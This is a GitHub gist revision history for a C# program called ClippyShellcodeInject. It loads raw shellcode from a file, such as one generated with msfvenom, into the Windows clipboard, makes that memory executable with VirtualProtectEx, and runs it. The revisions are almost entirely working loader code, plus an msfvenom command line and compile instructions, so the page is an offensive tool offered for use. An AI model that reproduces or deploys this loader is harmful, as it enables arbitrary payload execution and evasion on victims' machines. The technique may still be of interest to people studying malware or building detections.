Created
November 25, 2021 09:17
-
-
Save johnjohnsp1/9aec3c3cebfd67a22ba205d304f9845a to your computer and use it in GitHub Desktop.
Revisions
-
Wra7h revised this gist
Nov 22, 2021 . 1 changed file with 6 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -19,7 +19,12 @@ static void Main(string[] args) OpenClipboard(IntPtr.Zero); GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned); IntPtr payloadpointer = payloadArray.AddrOfPinnedObject(); // SetClipBoardData() formats that work: // CF_BITMAP = 0x2, CF_DSPBITMAP = 0x0082, CF_PALETTE = 0x9 // https://docs.microsoft.com/en-us/windows/win32/dataxchg/standard-clipboard-formats IntPtr scData = SetClipboardData(0x2, payloadpointer); //CF_BITMAP = 0x2 CloseClipboard(); uint oldProtect = 0; //Old protect is RW by default if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect)) -
Nov 21, 2021 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,6 @@ // Using the clipboard as your code cave. // Generate your shellcode with msfvenom or whatever // Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin> // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs using System; -
Nov 20, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,47 @@ // Using the clipboard as your code cave. // Generate your shellcode with msfvenom or whatever // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs using System; using System.IO; using System.Runtime.InteropServices; namespace ClippySCInject { class Program { private delegate IntPtr test(); static void Main(string[] args) { byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin"); OpenClipboard(IntPtr.Zero); GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned); IntPtr payloadpointer = payloadArray.AddrOfPinnedObject(); IntPtr scData = SetClipboardData(2, payloadpointer); CloseClipboard(); uint oldProtect = 0; //Old protect is RW by default if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect)) { test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test)); executesc(); } } [DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)] private static extern bool OpenClipboard(IntPtr hWndNewOwner); [DllImport("User32.dll", SetLastError = true)] static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem); [DllImport("user32.dll", SetLastError = true)] static extern bool CloseClipboard(); [DllImport("kernel32.dll")] static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr GetCurrentProcess(); } }